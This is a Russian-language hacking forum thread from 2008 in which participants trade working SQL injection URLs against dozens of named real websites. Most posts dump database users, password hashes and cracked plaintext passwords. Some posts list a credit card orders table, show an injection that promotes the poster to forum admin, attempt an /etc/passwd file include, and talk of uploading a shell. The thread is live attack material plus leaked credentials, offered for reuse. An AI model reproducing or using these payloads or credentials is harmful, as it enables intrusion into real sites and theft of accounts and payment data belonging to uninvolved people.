4.1.22:rifpark@dix.hc.ru:wwwrifparkru_wwwrifparkru _wwwrifparkru

Министерство образования РК(Республика Карелия) =D
http://minedu.karelia.ru/index.php?id=999+union+select+1,2,concat_Ws(0x3a,v ersion(),user(),database()),4,5/*
4.0.11a-gamma:kfro@localhost:minedu

http://www.radiolemma.ru/inner.php?t=progs&id=-22177+union+select+concat_ws(0x3a,version(),user() ,database()),2,3/*
4.1.22-community-max:lemma@inetsvr.media.local:lemma

-=Static=-

05.09.2008, 04:24

Министерство образования РК(Республика Карелия) =D
http://minedu.karelia.ru/index.php?id=999+union+select+1,2,concat_Ws(0x3a,v ersion(),user(),database()),4,5/*
4.0.11a-gamma:kfro@localhost:minedu

нашел 2 таблицы:
- news
- users

http://minedu.karelia.ru/devel/index.php?id=999+union+select+1,2,concat_ ws(0x3a,id,login,status),4, 5+from+users/*

1:root:rt
2:julia:wk
3:dmalinov:rt
4:Marina:rt
5:lataki:wk
6:kossuk:wk
7:morozov:wk
8:natalya:wk
9:gold:wk

Не могу никак прознать как поле с паролем называется :confused:

логиниться тут: http://minedu.karelia.ru/login.php

====================================
Карельский Фонд Развития Образования:

http://kfro.karelia.ru/index.php?id=13+union+select+1, id,login+from+users/*

Таблица по строению такая же как и в министерстве. И лежит все удовольствие на одном серваке, тока в разных базах. Вопрос: Как называется поле с паролем? :confused:

====================================

КПМО в Республике Карелия:

есть возможность провести include. Тока у меня толком них не получается. Голова уже кипит...

http://kpmo.karelia.ru/file/page.php?page_id=../../../../../etc/passwd%00

Че не так то?

Это же инклудится; http://kpmo.karelia.ru/file/page.php?page_id=/home/kpmo/www/file/news_62

Twoster

05.09.2008, 10:00

Еще 7 штучек!

http://www.graphicallies.com/news.php?ID=-1+union+select+1,user(),version(),4,database(),6,7 ,8/*

http://www.cageprisoners.com/print.php?id=-1+union+select+1,2,user(),database(),5,6/*

http://www.democracy.ru/print.php?id=-1+union+select+1,2,user(),4,database(),6,7,8,9,10, 11,12,13,14,15/*

http://www.ecom-info.spb.ru/indicators/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user( ),database(),version(),17,18,19,20,21,22,23,24,25, 26/*

http://www.interesulpublic.ro/print.php?id=-1+union+select+1,2,3,4,user(),6,7,database(),9,ver sion(),11,12,13,14,15,16,17,18/*

http://www.geo.pu.ru/modules/articles/print.php?id=-1+union+select+1,2,3,4,user(),version(),database() ,8,9,10,11,12,13,14,15,16,17,18,19,20/*

http://www.ecom-info.spb.ru/news/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user( ),database(),version(),17,18,19,20,21,22,23,24,25, 26/*

_Pantera_

05.09.2008, 10:17

есть возможность провести include. Тока у меня толком них не получается. Голова уже кипит...

http://kpmo.karelia.ru/file/page.php?page_id=../../../../../etc/passwd%00

Че не так то?

Это же инклудится; http://kpmo.karelia.ru/file/page.php?page_id=/home/kpmo/www/file/news_62

Ты обрати внимание на вот эту ошибку

Warning: main() [function.main]: Failed opening '../../../../../etc/passwd\0.html' for inclusion (include_path='.:/usr/share/pear') in /home/kpmo/www/file/page.php on line 26

приписывается расширение .html, ты конечно пытался его обрезать, но на сервере magic_quotes_gpc = On, т.е обрезать расширение не получиться.....

Ну а если обратить внимание на первую ошибку:
Warning: main(../../../../../etc/passwd\0.html) [function.main]: failed to create stream: No such file or directory in /home/kpmo/www/file/page.php on line 26

То видно, что сдесь удаленный инклуд, только опять же все портит расширение.....

Мистерео

05.09.2008, 13:25

Еще 7 штучек!

http://www.cageprisoners.com/print.php?id=-1+union+select+1,2,user(),database(),5,6/*
Итак
все таблицы
-admins
-articles
-banners
-campaign
-categories
-config
-downloads
-feedback
-images
-pages
-prison_images
-prisoners
-prisons
-prs_images
-prs_letters
-quotes
-ticker
-timeline

Смотрим Admins

-admins
--username
--password
--email
--level
--last_login

На Username и password состовляем запрос

http://www.cageprisoners.com/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6+from+admins+limit+1,1/*
И получаем

Frodo:F8wsn.HKddfWfe0eJ.jEV/
SamG:Cn3At9msGsMmHeU.eMzUo0
Gandalf:Uh00xKufkwGB.HWIvgWTv0

чем разшифровывать эти хеши я х.з. поетому кто разшифрует плиз скиньте в личку пассы

Кстати пошарив по сайту нашел админку для составления рассылок
http://cageprisoners.com/mailman/admin

Мистерео

05.09.2008, 15:18

http://www.graphicallies.com/news.php?ID=-1+union+select+1,user(),version(),4,database(),6,7 ,8/*

Итак розбираем )
версия 5 значит смотрим таблицы
http://www.graphicallies.com/news.php?ID=-1+union+select+1,2,table_name,4,5,6,7,8+from+infor mation_schema.tables+limit+1,1/*
среди них находим нужную _adminusr и смотрим на колонки и находим интерисующие нас pass,username и составляем запрос на чтение

http://www.graphicallies.com/news.php?ID=-1+union+select+1,2,concat_ws(0x3a,username,pass),4 ,5,6,7,8+from+_adminusr/*

Получаем результат
graphicadmin:10b8e9fc9fc6e8c5d42fb63f948934f6
Пробиваем хеш по базам и получаем
graphicadmin:topuser22

Потом сканим сайт на директории и файлы и находим кучи админок
http://www.graphicallies.com/admin/ - стоит basic аутидентификация логин и пасс не подходят
Нашел ище одну http://www.graphicallies.com/admincontrols/index.php - но опьять же логин и пасс невалидны
ище одна форма входа http://www.graphicallies.com:/hitech/userlogin.php - то самое логин и пасс невалидны
http://www.graphicallies.com/newtestsite/admin/ -админка в которой ниче нельзя сделать...

Где находится админка от сайта или где можна использовать логин\пароль х.з.

Мистерео

05.09.2008, 20:04

http://www.democracy.ru/print.php?id=-1+union+select+1,2,user(),4,database(),6,7,8,9,10, 11,12,13,14,15/*

Итак приступим.
Версия 5 на серве стоит пошарив по сайту нашел пхпббшный форум так что иньекция была проведена буквально за пару секунд запросом

http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_pa ssword),4,5,6,7,8,9,10,11,12,13,14,15+from+phpbb_u sers+limit+1,1/*

Откуда посыпались акки как переспелые мандарины с дерева ))) взял я все три акка которые были в базе и моим уловом стал

Andrey:2c44e4b135929e56f778fadc97077465
Елена Алексеенко:ffae0a5ec97c310be6bb424a35d03 cfc
Kremniov:c4ca4238a0b923820dcc509a6f75849b

Начал проганять хеши через сервисы и только последний был взломан
Kremniov:1
попробовав пробить форум на login.php или admin.php я получил кулаком в лоб ни то ни другое не было найдено в дело пошел сканнер и выдал чтото в виде
http://www.democracy.ru/admin/
но и тут меня ждало разочарование юзалась примитивная basic аутидентификация ни логин ни пароль от того что имелось не было...

А с форумом меня радости не ждало т.к. логин страница была удалена (и нафига им это хотя у них весь форум в спаме...)

P.S.Также я прошелся по таблицам в поисках чего нибудь вкусного сразу говорю ниче интересного вы там не найдете (150 таблиц всякого мусора )))

login999

06.09.2008, 00:20

http://www.mibf.ru/index.php?id=37+union+select+1,id,3,4,5,6,7,8,9,10 +from+users/* -скуля таблицу и одно из полей подобрал, дальше хз, + не вижу, куда выводятся результаты (в теле страницы вроде нет)

bons

06.09.2008, 01:13

http://www.fun.te.ua/?news=-1+union+select+11,22,version(),44,user(),database( )/*

user: funteua@localhost
database: funteua
version: 5.0.45

запись админа из таблицы users:

http://www.fun.te.ua/?news=-1+union+select+11,22,33,44,Login,Password+from+use rs+WHERE+ID=1/*

Там еще форум есть phpbb3. Хэш админа:

http://www.fun.te.ua/?news=-1+union+select+11,22,33,44,username,user_password+ from+forumfun.phpbb3_users+WHERE+user_id=2/*

Мистерео

06.09.2008, 10:30

Там еще форум есть phpbb3. Хэш админа:

http://www.fun.te.ua/?news=-1+union+select+11,22,33,44,username,user_password+ from+forumfun.phpbb3_users+WHERE+user_id=2/*

На форуме валяется два админа
Первый Co1T второй ch@os
хеш кольта пробивкой по мд5 ниче не дало а вот на ch@os'а мне выдало

ch@os:641a668c3d04a7564b278413445808a5
Пробив хеш получилось
ch@os:18121985

Логинимся на форуме выбираем админ панель и вуаля!Мы в админке

bons

06.09.2008, 15:44

http://www.samara-sv.info/?static=-1'+union+select+111,user(),database(),version(),55 5,666/*

user - samara@localhost
database - samarasv2_main
version - 5.0.22-log

есть таблица users с двумя записями, вот только неизвестно от чего это

http://www.samara-sv.info/?static=-1'+union+select+111,login,passw,user_id,555,666+fr om+users/*

9 turist ec6d9c8953ab272295ec0469bbed59ab (mountain)
11 budym c645ef64e05f5c5c47e4b204a43b3323 (?)

Rubaka

06.09.2008, 20:11

http://www.laterre.ca/?action=lienSousCat&idLienSousCat=116/**/UNION/**/SELECT/**/1,2,concat(user,0x3a,password),4,5,6,7,8,9,30,31,3 2+from+mysql.user+limit+1,1/*

root:717714425d27f95d

USAkid

07.09.2008, 10:29

http://www.spakedr.ru

http://www.spakedr.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user() ,0x3a,database())/*

version() - 4.0.24-standard-log
user() - slavalne_joomla@localhost4.0.24-standard-log
database() - 4.0.24-standard-logslavalne_joomla

http://www.spakedr.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,passwor d,0x3a,usertype)+from+jos_users/* - запрос на логин/пасс/статус админа, но чето он отвергается.

..::TROYAN::..

07.09.2008, 13:01

http://www.maljutka.ru/shop/goods.php?id=9+union+select+1,concat(user(),0x3a,d atabase(),0x3a,version()),null,4,5,6,7/*
http://www.maljutka.ru/shop/shop.php?id=9999+union+select+1,concat(user(),0x3a ,database()),3,4,5,6/*
user - maljut01@fe59-1.hc.ru
database - wwwmaljutkaru
version - 4.1.22

USAkid

07.09.2008, 15:12

http://www.irvconsulex.cz/

http://www.irvconsulex.cz/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user() ,0x3a,database())--

version() - 4.1.18-log
user() - irvconsulex-cz@localhost
database() - logirvconsulex-cz

Админ:
http://www.irvconsulex.cz/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,passwor d)+from+jos_users+limit+0,1--

login/hash/salt:

admin : 506e5a43e1ed6052fc003c157483b73d : IUsUB8uMKz7Qt2wJ

DimOnOID

07.09.2008, 17:01

http://www.cm-lousa.pt/servicos/news.php?id=99999+union+select+1,concat_ws(0x40,ho st,user,password,file_priv,version()),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17+from+mysql.user/*

Fugitif

07.09.2008, 20:39

http://www.wtopnews.com/index.php?nid=25&sid=1+UNION+SELECT+concat_ws(0x3a,version(),databa se(),user()),2/*
5.0.32-Debian_7etch5-log:dc_inform:informant@micro3.bonnint.net

http://www.lam.org/news/article.php?id=1%20UNION%20SELECT%201,concat_ws(0x 3a,version(),database(),user()),3,4,5,6,7,8,9/*
4.0.26-standard-log:lam:lam@vhosts23.web.gcii.net

[Dezzter]

07.09.2008, 22:01

http://www.tricitysra.org/display?help=Information&topic='+union+select+1,2,3,4,5,6,7,8,9,0,1,concat( version(),char(58),database(),char(58),user()),3,4 ,5/*
5.0.45:tri:tri@localhost

N1K70

08.09.2008, 09:00

Proover.Comhttp://proover.com/search_results.php?cid=-1/**/union/**/select/**/1,user(),3,4,5,6--

=\\\

USAkid

08.09.2008, 09:24

Proover.Comhttp://proover.com/search_results.php?cid=-1/**/union/**/select/**/1,user(),3,4,5,6--

=\\\

Интересно по нему лазить, раскрутил бы дальше ;)

Версия > 5 => узнаем пасс легко.
http://proover.com/search_results.php?cid=-1+union+select+1,column_name,3,4,5,6+from+informat ion_schema.columns+where+table_name=0x457368705f6d 656d62657273--

Тэкс, Es_pwd и admin_name то, что нас интересует.

http://proover.com/search_results.php?cid=-1+union+select+1,concat_ws(es_admin_name,0x3a,es_p wd)3,4,5,6+from+eshp_admin--

Получаем Admin:A

Полезли в мемберс:
http://proover.com/search_results.php?cid=-1+union+select+1,concat_ws(es_username,0x3a,es_pas sword),3,4,5,6+from+eshp_members+limit+2,1--

И вот пошли логины с пассами.
Пассы открытые :)

Cennarios

08.09.2008, 13:16

http://www.scooter-center.ru/detail/?id=-1+union+select+concat(0x3a3a,login,0x3a3a,password ,0x3a3a),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22+from+cmf3_sc.bof_users+limit+0,1/*

login: wolf pass: 123
--------------------------------------------------

http://www.travelnetcuba.it/hotels.php?id_hotel=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(table_n ame,0x3a3a,table_schema),12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+ from+information_schema.tables+limit+37,1/*

login: lorenzo
pass: 883777
--------------------------------------------

http://www.ipiccolissimi.it/root/catalogo.php?cat=1&tipologia=1&idMacro=37&idMicro=-1+union+select+1,concat(0x3a3a,login,0x3a3a,passwo rd)+from+utenti+limit+0,1/*
login: ipiccolissimi
pass: natura06thamm04

---------------------------------------------

USAkid

08.09.2008, 14:04

.us

http://www.turkuaz.us/content.php?magId=-25+union+select+1,2,3,4,concat_ws(version(),0x3a,u ser(),0x3a,database()),6,7--

version() - :4.1.22
user() - turkuaz-us@89.106.12.59
database() - turkuazus

USAkid

08.09.2008, 14:27

http://laneuse.ci.minneapolis.mn.us

http://laneuse.ci.minneapolis.mn.us/closure.php?pn=1+union+select+concat_ws(version(), 0x3a,user(),0x3a,database()),2,3,4,5--

version() - 5.0.58
user() - traffic7@localhost
database() - tmo

До пасса добраться удалось, он в открытом виде:
http://laneuse.ci.minneapolis.mn.us/closure.php?pn=1+union+select+concat_ws(login,0x3a ,password),2,3,4,5+from+users+limit+0,1--

Login/password:

jason / bond007 (пасс улыбнул)... :)

--------------------------------------------------------------------
Еще чуть-чуть (тож .us):
http://mobile.sugarcube.us
http://mobile.sugarcube.us/details.php?id=-1+union+select+1,concat_ws(version(),0x3a,user(),0 x3a,database()),3,4,5,6,7,8,9,10,11--

version() - 4.0.27-max-log
user() - newvintage@64.202.163.213
database() - newvintage

USAkid

08.09.2008, 14:56

И еще немного .us

http://www.ultrashine.us

http://www.ultrashine.us/product_item.php?cat=&item=-7+union+select+1,concat_ws(version(),0x3a,user(),0 x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14--

version() - 4.0.27-max-log
user() - dbo206430733@74.208.16.924.0.27
database() - db206430733

--------------------------------------------------------------------

http://www2.ci.poway.ca.us/

http://www2.ci.poway.ca.us/pcpa/pcpadetail.php?eventid=176+union+select+1,concat_w s(version(),0x3a,user(),0x3a,database()),3,4,5,6,7 ,8,9,10,11,12,13--

version() - 5.0.60-log
user() - powaycity@localhost
database() - powaycity

MirA

08.09.2008, 18:39

http://www.uniprod.ru

алкошоп)

version() = 4.1.22
user() = uniprod@localhost
database() = wwwuniprodru

http://www.uniprod.ru/mods.php?name=shop&action=goodsinfo&id=-272+union+select+1,2,3,4,concat_ws(0x3a3a3a,versio n(),user(),database())/*

есть табличка fs_users с полями:
uname
passwd
uid
email

вот конечный запрос,пассы в md5, но в основном есть в он-лайн базах...

http://www.uniprod.ru/mods.php?name=shop&action=goodsinfo&id=-272+union+select+1,2,3,4,concat_ws(0x3a3a3a,uname, email,passwd)+from+fs_users+limit+0,1/*

Pashkela

09.09.2008, 04:11

Наконец-то вернулся домой, отдохнул прекрасно. Тэкс, теперь за дело:

mobilgamez.ru

http://mobilgamez.ru/ctlg.php?xn=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(v ersion(),0x3a,user(),0x3a,database()),13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51--

version() - 5.0.22
user() - admin_mobilgamez@89.188.106.170
database() - admin_mobilgamez

Вывод производится в title.

Сервер:
nginx/0.6.31

Админка какая-то странная, по идее тут:
http://mobilgamez.ru/admin , ввел наугад логин/пароль admin/admin ... Подойти вроде подошло, но ошибку 500 показало... Вот так вотЪ :)

Данные по полям user,password из таблицы admin_packer.admin_users:
-------
kosty:*CAA6A6EB56FA8757200E1BA2FAD09CD01220317A
lena:*348D2F9427DAD0C3D0EDBE03182DA2FB9E4C5DBF

winstrool

09.09.2008, 12:08

http://www.avtosreda.ru/new/meropr.php?id=-16+union+select+concat_ws(0x3a,id,user_name,user_p ass,user_mail,user_icq)+from+itaf_user+limit+0,1/*

$n@ke

09.09.2008, 14:39

http://www.knockers.org.uk/players.php?id=118+order+by+8--
Dbname:mycricket
Version:5.0.51a-community-log
User:lcs34@tango.rb.xcalibre.co.uk

members:
lynden:allen

========================================
http://www.sherlock-holmes.org.uk/event_info.php?id=141|SQL

DBname:sherlock_holmes
Version:4.1.22-standard
User:sherlock_general@localhost

Twoster

10.09.2008, 10:11

http://www.aavba.org/

Скуль:
http://www.aavba.org/articles.php?Id=-1+union+select+1,USERNAME,password,4,5,6,7+from+us ers+limit+1,1/*
Логин: VBSLLC
хеш: 5b5f366f63b42b17
Расшифровка хеша: noodles1

user() - aavba@localhost
version() - 5.0.22
database() - aavba

В админке есть какая то биллинг панель, на счету 99 $, также на сколько я понял сайт
http://virtualbankruptcyservices.net принадлежит этому же админу...
В общем, если кто дальше нароет, отпишитесь плиз!

И еще чуток разношерстных скулей:

http://www.sufficiencyeconomy.org/show.php?Id=-1+union+select+1,2,3,4,5,version(),7,user(),9,10,1 1,12,13,14,15/*
http://www.heizoel24.de/news.php?news_id=-1+union+select+1,user(),3,version(),database(),6/*
http://www.awrrtc.org/articles.php?id=-1+union+select+1,user(),version(),database(),5/*
http://www.sibezrcs.ru/articles.php?id=-1+union+select+1,user(),version(),4,database(),6,7 ,8,9,10,11/*
http://www.ladogorski.com/articles.php?id=-1+union+select+1,user(),version(),4,5,6,7/*
http://www.gloriahansen.com/articles.php?p=1&ID=-1+union+select+1,version(),3,user(),database(),6,7--
http://www.lynnmaloneyacupuncture.com/articles.php?ID=-1+union+select+1,2,version(),user()/*
http://www.4gr8teeth.com/articles.php?id=-1+union+select+1,user(),3,version()--

$n@ke

10.09.2008, 12:42

http://www.sensation.org.uk/index.php?p=10
Dbname: sensa_cms
Version: 4.1.22-standard
Username: sensa_website@localhost

password:username
test:alan@mtcmedia.co.uk
test:gordonkennovin@cxrbiosciences.com
test2:markchamberlain@cxrbiosciences.com

AkyHa_MaTaTa

10.09.2008, 14:08

PageRank: 5 тИЦ: 110

http://www.amadeo-russia.ru/brand/?brand=-1+union+select+1,table_name,concat_ws(0x2f,version (),user(),database()),4,5,6/*
(вывод в титле)

интересные таблы:
ws_users
ws_users2
bof_users
cmf_users
chat_users
invforumapi_users
invforummeetings_user
users

админки я так и не нашел, скорее всего ее нету:)

Twoster

10.09.2008, 14:41

И еще маленько:
http://www.theallergygroup.com/articles.php?id=-1+union+select+1,user(),3,version()/*

http://www.joelegecko.com/articles.php?id=-1+union+select+1,version(),user(),4,database(),6,7 ,8,9,10,11,12,13/*

http://profootballfocus.com/articles.php?tab=articles&arc=&id=-1+union+select+1,admin,password,4,5,6,7+from+membe rs--
(в поле admin выводит 0, выводит хеш пароля, но админку не нашел...)

http://www.u-coc.com/articles.php?id=-1+union+select+1,2,version(),database()/*

$n@ke

10.09.2008, 14:47

ппц как жрать охота..вот замена небольшая))
http://euclid.hamline.edu/~arundquist/php/mysql/movies/showmovie.php?movie_id=279
Name: test
Version: 4.1.22-log
Username: arundquist@localhost

ADD
============================================
http://www.celtnet.org.uk/mobile-phone/rt_readarticle.php?id=-1+union+select+username,password,3,email+from+user s/*
Database name: celtnet
Version: 4.1.19-standard-log
Username: celtnet@localhost

там пхпбб2 есть,но не будем тянуть хеши оттуда, так как логин и пасс покатят, и О ЧУДО, юзер окажецца админом....далее инклудим шелл и...а там кто что сможет)) при свежей BSDe (((

зы: куча команд отключена. советую попробовать include, ибо через passthru половина команд не досступна.(pwd катит).

Cennarios

11.09.2008, 03:52

http://taro.in.ua/index.php?page=subarticle&id=-1+union+select+1,2,3,concat_ws(0x3a3a,username,pas sword),5,6,7,8+from+f_users/*

http://taro.in.ua/forum

login: Филиса <-модер
pass: draco

lstsgoman

11.09.2008, 16:48

http://www.diza.in/pages/?id=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3/*

4.1.22-log:intelco1_intelcom:intelco1_maxanda@localhos

Помогите узнать нвзвания таблиц :( ужо запарилсо...

prescott

11.09.2008, 18:05

есть 100% инъекция:
http://www.product.ru/debetorShow.asp?IdDeb=20
http://www.product.ru/debetorShow.asp?IdDeb=21-1
НО union не проходит, IF не проходит, кто надет продолжение +10 в репу.

[Dezzter]

11.09.2008, 18:16

http://www.michaelpollan.com/article.php?id=-80+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5,6,7,8,9,10/*
4.1.22-standard/pollan_article@localhost/pollan_articles

Pashkela

11.09.2008, 18:42

http://www.diza.in/pages/?id=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3/*

4.1.22-log:intelco1_intelcom:intelco1_maxanda@localhos

Помогите узнать нвзвания таблиц :( ужо запарилсо...

http://www.diza.in/pages/?id=-1+UNION+SELECT+1,id,3+from+forum.ibf_members/*

но в ответ:

ERROR: SELECT command denied to user 'intelco1_maxanda'@'localhost' for table 'ibf_members'

так что не получится. Но такая табличка есть:)

0nep@t0p

11.09.2008, 18:44

2 prescott
http://www.product.ru/debetorShow.asp?IdDeb=-20+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12 ,13,14--
А говорил - union не катит...

Fugitif

11.09.2008, 23:57

http://www.cajaviviendapopular.gov.co/not.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,v ersion(),database(),user()),3,4,5,6,7,8,9,10,11/*
5.0.22:cvp:basecvp@localhost

http://www.consuladopoloniasp.org.br/publicar/view-not.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,v ersion(),database(),user()),3,4,5/*
4.1.22-standard-log:consuladopolonia:consuladopolonia@200.234.200. 22

Cennarios

12.09.2008, 03:11

http://www.elcom.md/category_1.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws(0x3a3a,mail,psw),15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44+from+elcom_users/*

Через создание лота есть возможность залить произвольный файл )) SECURE ON ...

Evil_Grey

12.09.2008, 03:56

http://www.lasermax.com/product.php?id=9999999'+union+select+1,email,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28+from+old_emails/*
admins email

http://www.lasermax.com/product.php?id=9999999'+union+select+1,cardnumber, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28+from+store_orders/*
store_orders:
orderTime confirmation_id email phone b_first_name b_last_name b_address_1 b_address_2 b_city b_state b_zip b_country b_county taxrate s_copy s_first_name s_last_name s_address_1 s_address_2 s_city s_state s_zip s_country s_method cardname cardnumber cardtype expmonth expyear subtotal shipping tax total waiting fulfilled confirmed exported
columns:
CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS Links admins 18 blast2_list blast3_list blast_list comments dealers 23 distributors downloadImages downloads expert_reviews faqs installation_guides news newsPrefs old_emails old_lelist product_updates remove_list state_lookup store_cart store_cartitems ? store_categories store_codes store_item store_item_details store_orderitems store_orders testimonials tradeshows tradeshows_le zipcodes

5.0.45-log
lasermax
viewer@localhost

Cennarios

12.09.2008, 19:39

http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a3a,nic,upass,adm),16,17,18,19,20,21,22 ,23,24,25,26,27,28+from+user+where+adm=1/*

У конторы котора делала этот сайт все проекты дырявые.....

P3L3NG

13.09.2008, 00:55

http://www.h4cky0u.org/viewtopic.php?f=6&t=28114&start=0&st=0&sk=t&sd=a

раскрытие пути. в общем чтото странное =)

ответ № 6666 =)

.Begemot.

13.09.2008, 16:37

http://www.kinoafisha.ru

В догонку еще один уязвимый скрипт с этого же сайта -
http://www.kinoafisha.ru/wf/branch.php?id_br=63297+union+select+0,1,2,3,table_ name,5,6,7,8,9,10,11+from+information_schema.table s/*&id_s=8

http://www.kinoafisha.ru/wf/branch.php?id_br=63297+union+select+0,1,2,3,concat (USER(),0x3a,VERSION(),0x3a,DATABASE()),5,6,7,8,9, 10,11/*&id_s=8

Cennarios

13.09.2008, 16:59

http://www.ecub.com.ua/index.php?target=3&sem_id=-1+union+select+1,concat_ws(0x3a3a,user_name,user_p assword),3,4,5,6,7,8+from+users+limit+0,10/*

login: junglin
pass: spider

очередные пидоры...

Liar

13.09.2008, 19:36

Только сначала регестрируемся :)

http://www.lucianopires.com.br/idealbb/profile/default.asp?pvtFolNo=0'

далее при помощи запроса:

0';update [dbo].[Members] set [dbo].[Members].[M_Level]=3 where [dbo].[Members].[Member_ID]=3407--

где 3407 был мой ид :)
мы становимся админом ;))

и так в итоге

liar - login
123123 - pass

и мы админ ;)

Зы:вообщето есть видео этого взлома но на моём жопорезе и побайтово накладно выйдет поэтому давольствуемся этим
Зы2: заходим с оперы, так как сайт может быть небезопасен, ну вообщем я предупредил

$n@ke

13.09.2008, 20:40

http://www.bcs-remembrance.org.uk/index/summary.php?sdeathid=131+union+select+1,config_nam e,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+phpbb_config+limit+57,1/*
версия 4
нашел вот пхпбб.залить не вышло,то там лажа, то там..и еще и бейз дир по моему..(
jbou:6cee2033f74468edae63e3142e3ed403:trouble

ArxWolf

14.09.2008, 05:13

www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2 ,3,4,5,SQL,7,8,9,10,11,12,13,14--

version() => 5.0.27
database() => hiro
user() => ably@localhost

БД

Database:
a1
ablycontract
acucare
advancedesign
amigatech
asiagroup
asp
autogates
best-selection2
bonric
bossil
brightpancar
cattest
chemibond
cipta
coffe
coralvista
craft_joomla123
cross
dalcy-33
dc
dearmaninew
dqcreative
dre
edging
edmund
esping
f5
galle
gold
guppy
gysteel
hawk
hee
henglee
hillgen
hiro
hunglee
ibcom
indulge
intergrated
isella
ivycorp
jark
jbchair
jian
kaeykinheng
kinheng
kolling
kpi
laboff
latitude
lh_db
liverte
lls
maju
mascorn_mascorn
mavis
maxfiredb1
meika
misilkad
mistercoffee
murni
mysql
netfun
newtica
onestop
pacific
pacregcom
panwrite
perfect
ppproduct
procasa
puipui
qc
rec
reliable
reliance
reliancehydraulic
reliancemetal
rotomas
roundcubemail
sandarts
sdp
seasonair
sengtat
setapakaquarium
sgcon
shuz
shzen
sicomel
sicomel_db
simsiangchoon
simta
singkee
sml
sunshine
superceramic
tarching
tienming
titovkinheng
topa
triplast
twinbow
universal
univonna
vertical
visionworth
vitaltechnical
wiltek
wood
yoke
yongrong
yuenchun
yuenchuntest
zenne
zodiac
zolanodata

Mysql юзеры

http://www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2 ,3,4,5,concat(User,0x3a,Password),7,8,9,10,11,12,1 3,14+from+mysql.user+limit+1,%201--
root:707290e61494c630
bsshu:7a3310dc39c1d3df
edmund:284f5fe14f30564d
si-comel:7a4e275338ddec88
и т.д

Хостится более 300 доменов :P юзайте...

ArxWolf

14.09.2008, 05:41

http://www.inventarium.com/en/item.php?id=57=null%20union%20all%20select%200,1,2 ,3,SQL,5,6,7,8,9,10,11,12,13,14,15--

version() => 5.0.27
database() => inventarium
user() => web@cl-t089-130cl.privatedns.com

БД:

inventarium
test

Таблицы inventarium:

NEWS
bank
bank_option
banqueInfo
bo
bp
cart
cartitem
category
color_definition
color_definition_copy
customer
delais
demande_banque
didyouknow
document
document_dossier
document_gestion_dossier
dossier
etape
format
google
history
information
intervenant
inventeur
invention
invoice
invoice_line
mc
member_news
members
message
message_intervenant
message_step
options
pressreview
product
produits
region
requetes
resultat
revue_presse
sondage
sondage_reponse
special_payment
t
type_etape
type_taxe
user_bank
user_log
user_step_details
version
ville

ArxWolf

14.09.2008, 06:30

http://www.vsa.hr/novosti.php?id=113=null%20union%20all%20select%200 ,1,2,SQL--

version() => 5.0.32-Debian_7etch6-log
database() => puckoot1
user() => puckoot1@localhost

БД:

puckoot1
test

Таблицы puckoot1:

admin_smajlici
comments
comments_backup
forums
knjiga_gostiju
main
prijavnice
prijavnice07
sitestats_agent
sitestats_country
sitestats_daily
sitestats_gets
sitestats_imgs
sitestats_ip
sitestats_log
sitestats_platform
sitestats_query
sitestats_ref_domain
sitestats_ref_url
sitestats_screen
sitestats_url
sitestats_vars
users
vijesti

masternet

14.09.2008, 12:36

http://www.kiirus.ee/php/index.php?lang=rus&id=1 - жопа..я залил её в новость...
с помощью sql-injection
http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,name_admin,3,4,5,6+from+admin
имя админа
http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin
md5-хеш пасса админа...

Shadow_p1raT

14.09.2008, 12:37

Нацарапал за пол часа.
mysql>4.x

flashgamealot.com

http://www.flashgamealot.com/game.php?id=-18+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18/*
Version:5.0.45
User:merlin@localhost
Basename:flashgamealot

crana.org.au

http://www.crana.org.au/cr.php?ID=-9+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24/*
Version:5.0.46
